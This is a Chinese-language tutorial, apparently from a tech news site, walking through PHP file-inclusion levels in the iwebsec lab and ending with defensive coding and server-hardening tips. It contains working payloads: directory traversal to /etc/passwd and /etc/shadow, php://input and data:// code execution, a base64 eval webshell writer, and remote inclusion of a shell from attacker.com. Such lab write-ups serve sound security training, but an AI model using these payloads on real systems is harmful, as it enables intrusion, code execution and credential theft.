PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析

发布时间:2026/9/1 10:51:32
PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析 PHP 文件包含漏洞实战iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析在 Web 安全领域文件包含漏洞File Inclusion Vulnerability一直是渗透测试中的高频攻击点。iwebsec 靶场作为国内知名的 Web 安全实战平台其文件包含模块设计了 10 个由浅入深的关卡全面覆盖了本地文件包含LFI、远程文件包含RFI、Session 文件包含以及 PHP 伪协议利用等核心攻击手法。本文将基于实战视角系统性地拆解这 10 个关卡的技术要点并深入分析 3 类关键伪协议的底层原理与创新利用方式。1. 靶场环境搭建与基础概念1.1 Docker 靶场快速部署使用官方提供的 Docker 镜像可在 30 秒内完成环境搭建docker pull iwebsec/iwebsec:latest docker run -d -p 8001:80 --name iwebsec iwebsec/iwebsec访问http://localhost:8001即可进入靶场界面文件包含漏洞模块路径为/fi/目录。1.2 文件包含漏洞本质当 PHP 代码使用以下函数动态包含文件时若未对参数进行严格过滤则可能引发漏洞include($_GET[file]); require_once($path.header.php);攻击者通过控制文件路径参数可实现读取服务器敏感文件/etc/passwd执行任意 PHP 代码WebShell触发反序列化漏洞漏洞类型对比表类型触发条件典型危害本地文件包含(LFI)能访问服务器本地文件敏感信息泄露、代码执行远程文件包含(RFI)allow_url_includeOn直接获取服务器控制权Session 文件包含Session 内容可控权限提升、持久化后门2. 基础关卡本地文件包含实战2.1 关卡 1直接文件包含漏洞代码// fi/01.php $filename $_GET[filename]; include($filename);利用方式http://localhost:8001/fi/01.php?filename../../../../etc/passwd关键技巧使用../进行目录遍历Linux 常见敏感文件路径/etc/passwd # 用户账户信息 /proc/self/environ # 环境变量 /var/log/apache2/access.log # Web日志2.2 关卡 2过滤绕过技术当系统过滤/字符时可采用以下手法方法一URL 编码绕过?filename..%2f..%2f..%2fetc%2fpasswd方法二超长路径截断PHP5.2.8# 生成 4096 个字符的路径 payload ./*2048 etc/passwd3. 高阶利用Session 与伪协议3.1 关卡 3Session 文件包含攻击链构建发现 Session 可控点/fi/03.php?iwebsec?php phpinfo();?获取 Session ID// Chrome DevTools - Application - Cookies document.cookie.match(/PHPSESSID([^;])/)[1]包含 Session 文件/fi/01.php?filename../../../../var/lib/php/sessions/sess_abc123Session 文件路径规律默认路径/var/lib/php/sessions/命名规则sess_[PHPSESSID]3.2 关卡 6-8PHP 伪协议深度利用3.2.1 php://filter 协议源码读取技巧/fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php提示Base64 编码可避免 PHP 代码被直接执行过滤器链组合应用# 多重编码绕过WAF payload php://filter/convert.iconv.UTF-8.UTF-7|convert.base64-encode/resourceconfig.php3.2.2 php://input 协议POST 数据执行GET /fi/07.php?filenamephp://input HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded ?php system(id);?木马写入技巧?php file_put_contents(shell.php, base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7));4. 远程文件包含与特殊协议4.1 关卡 4-5RFI 利用条件必要配置检查// php.ini 关键配置 allow_url_fopen On allow_url_include On绕过域名限制技巧/fi/05.php?filenamehttp://attacker.com/shell.txt? /fi/05.php?filenamehttp://127.0.0.1:8080/bypass.txt%234.2 关卡 9-10data:// 与 file:// 协议data:// 代码执行/fi/10.php?filenamedata://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOwfile:// 绝对路径读取/fi/09.php?filenamefile:///etc/shadow5. 防御方案与实战建议5.1 安全编码规范// 白名单校验 $allowed [header.php, footer.php]; if(in_array($file, $allowed)) { include($file); } // 路径固定化 define(BASE_DIR, /var/www/includes/); include(BASE_DIR . $file);5.2 服务器加固措施PHP 配置优化allow_url_include Off open_basedir /var/www/html:/tmp文件权限控制chmod -R 750 /var/www chown -R www-data:www-data /var/www在实战渗透测试中文件包含漏洞往往与文件上传、SQL 注入等漏洞形成组合攻击链。建议在 iwebsec 靶场中尝试以下进阶练习通过 LFI 读取数据库配置文件结合日志文件包含实现无文件攻击利用 phar:// 协议触发反序列化

相关新闻

Frida + Objection 自动化Hook实战:1条命令绕过App SSL Pinning证书绑定

Frida + Objection 自动化Hook实战:1条命令绕过App SSL Pinning证书绑定

Frida与Objection自动化Hook实战:SSL Pinning绕过技术深度解析 1. 移动安全测试中的SSL Pinning挑战 在移动应用安全测试领域,SSL Pinning(证书绑定)技术已成为开发者保护数据传输安全的重要手段。这项技术通过将服务器证书或公钥…

发布时间:2026/8/21 14:27:59
河北建设厅网站怎么搜索文件?别瞎找,这招最管用!

河北建设厅网站怎么搜索文件?别瞎找,这招最管用!

说实话,找文件这事儿 真挺让人头大的。特别是那种 带红头文件的 看着就头疼。你是不是也遇到过 明明知道有这文件 就是死活搜不到?别急,今天咱就 把河北建设厅网站怎么搜索文件 这事儿,掰开了揉碎了说。先别急着点那个 大大的搜索框。很多人第一步就错了。你直接输个“通知…

发布时间:2026/8/20 3:36:18
网站建设 豫icp备怎么搞?老鸟掏心窝子分享真实价格与避坑指南

网站建设 豫icp备怎么搞?老鸟掏心窝子分享真实价格与避坑指南

做网站最怕什么?怕被坑钱还拿不到东西,怕备案被卡半年动不了。这篇文章不整虚的,直接告诉你找外包到底该花多少钱,怎么审合同,以及那个让人头秃的备案流程怎么快速过。先说钱。市面上报价从几百到几万都有,水太深。如果你只是要个展示型企业官网,别信那些说几百块全包还…

发布时间:2026/8/21 22:50:08
跑断腿?我在平阳县建设局网站办证的血泪史与避坑指南

跑断腿?我在平阳县建设局网站办证的血泪史与避坑指南

说实话,以前我对“跑审批”这四个字充满了恐惧。总觉得那是只有大企业或者专业中介才能玩转的游戏,咱们普通小老板或者刚入行的工程人,根本摸不着头脑。直到上个月,我为了一个小型装修项目的施工许可,硬着头皮去了一趟平阳县建设局网站,结果发现,只要找对路子,这事儿真…

发布时间:2026/8/31 13:10:02
为什么你的网站留不住人?揭秘建设网站会员体系的底层逻辑与实操指南

为什么你的网站留不住人?揭秘建设网站会员体系的底层逻辑与实操指南

很多老板都在问:为什么我的网站流量不少,转化率却惨不忍睹?其实,问题往往出在“留客”上。你花了大价钱买流量,用户进来逛了一圈,连个招呼都没打就走了。这就像开了一家实体店,顾客进门看看,然后转身离开,你连个联系方式都没拿到。这种“一次性买卖”思维,在今天的互…

发布时间:2026/8/31 9:21:16
徐州市丰县建设局网站 咋用才不踩坑?老业主掏心窝子分享

徐州市丰县建设局网站 咋用才不踩坑?老业主掏心窝子分享

昨晚半夜两点,我还在盯着手机屏幕,心里那个急啊。为啥?因为我家那套安置房的事儿,开发商那边一直拖泥带水,说是等公示,可公示啥样我心里没底。没办法,只能硬着头皮去查“徐州市丰县建设局网站”。说实话,第一次上去的时候,我整个人是懵的。界面那叫一个复古,跟咱们老…

发布时间:2026/8/31 20:35:25
龙口网站建设公司哪家好?别踩坑,看这几点就够了

龙口网站建设公司哪家好?别踩坑,看这几点就够了

本文关键词:龙口网站建设公司哪家好做企业官网,最怕啥?怕花了几万块,结果打开慢得像蜗牛,手机端还乱码。更怕的是,搜“龙口某某公司”,首页连个影子都找不着。钱打水漂,还耽误事。很多老板找我聊,开口就问:“龙口网站建设公司哪家好?”这话问得实在。毕竟龙口这地方…

发布时间:2026/8/31 20:06:05
别再被忽悠了!一份真正落地的建筑网站建设方案,专治各种花里胡哨

别再被忽悠了!一份真正落地的建筑网站建设方案,专治各种花里胡哨

说实话,我见过太多建筑公司的官网了。真的,多到让人想吐。要么就是满屏的大图,加载慢得像蜗牛。要么就是文案写得云里雾里,根本不知道你是干啥的。客户点进来三秒钟,啪,关掉了。这就叫浪费生命。今天我不讲那些虚头巴脑的理论。我就想聊聊,到底怎么做一个真正能接活的建…

发布时间:2026/8/31 9:13:08
个人做计算机编程与网站建设到底难不难?老程序员掏心窝子说几句

个人做计算机编程与网站建设到底难不难?老程序员掏心窝子说几句

这篇文章不讲那些虚头巴脑的理论,直接告诉你新手入坑计算机编程与网站建设最真实的坑在哪,以及怎么避开。很多人以为写代码就是对着黑屏幕敲字母,其实那是电影骗人的。真正的难点在于怎么把脑子里的想法变成别人能看懂、能用的网页。如果你正纠结要不要学,或者刚起步觉得头…

发布时间:2026/8/31 20:35:24